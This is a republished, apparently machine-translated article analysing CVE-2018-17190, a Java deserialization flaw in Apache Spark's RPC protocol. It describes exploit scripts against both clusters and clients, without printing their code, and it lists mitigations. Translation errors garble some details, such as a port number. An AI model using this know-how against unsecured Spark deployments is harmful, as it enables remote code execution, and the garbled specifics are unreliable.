In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-04-05 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)05/31 Report--
How to analyze the deserialization loophole in Apache Spark RPC protocol? in view of this problem, this article introduces the corresponding analysis and solution in detail, hoping to help more partners who want to solve this problem to find a more simple and feasible method.
Preface
Not long ago, Spark officially issued a security announcement entitled "CVE-2018-17190: Unsecured Apache Spark standalone executes user code".
The announcement indicates that the version affected by the vulnerability is the full version, and the fixed version is not marked, only the relevant mitigation measures.
The official mitigation measures are as follows: enable authentication on any Spark stand-alone cluster that is not protected by unnecessary access, such as through network-level restrictions. Use spark.authenticate and related security attributes.
The relevant documents are queried, and spark.authenticate is a configuration property in the RPC protocol, and this parameter controls whether Spark RPC uses a shared key for authentication.
Spark RPCS
Park RPC is a custom protocol. The underlying development is based on netty4, and the related implementations are encapsulated in spark-network-common.jar and spark-core.jar, where the former uses JAVA and the latter uses scala.
The internal structure of the protocol consists of two parts. The contents of header and body,header include the length of the entire frame (8 bytes), the type of message (1 byte), and the length of requestID (8 bytes) and body (4 bytes).
Body varies slightly according to the data types defined by the protocol.
The body of the RpcRequest message type is roughly constructed in two parts, the first half contains the address and port and name information of both sides of the communication, and then the serialized content of the java begins with ac ed 00 05.
A body with a message type of RpcResponse is directly the content of the unsequenced java.
Build a separate cluster server for Spark
Download from the official website, then specify the IP address with-h, and let the port listen on all network cards. / start-master.sh-h 0.0.0.0-p 70774.
Prove that there is a deserialization process on the server
Spark_exploit.py indicates the connection information of the remote spark cluster through the first parameter and the second parameter, and the third parameter is the JAVA deserialization vulnerability payload.
By calling the build_msg function to build the payload into a message and then send it to the server, the process is relatively simple.
Reverse operation client
The evil_spark_server.py script completes a simple TCP service by inheriting the BaseRequestHandler class, extracts request_id from the sent data, and then calls build_msg to send a legitimate RPC response packet composed of request_id and payload to the client.
Start the service
Use the spark client to connect
By grasping the packet to see the request data and reading the relevant code, the request data in RPC protocol is determined step by step. Both client and server use JAVA serialization to transfer data, and both sides can take advantage of it.
When you turn around and want to use deserialization to execute system commands, look for ysoserial and find that there is no suitable gadget other than to construct a utilization chain using an earlier version of jdk.
Over time, vulnerabilities in each library will be fixed and upgraded, and existing gadget will no longer work. Java deserialization vulnerabilities will eventually be a thing of the past.
This is the answer to the question on how to analyze deserialization vulnerabilities in Apache Spark RPC protocol. I hope the above content can be of some help to you. If you still have a lot of doubts to be solved, you can follow the industry information channel for more related knowledge.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.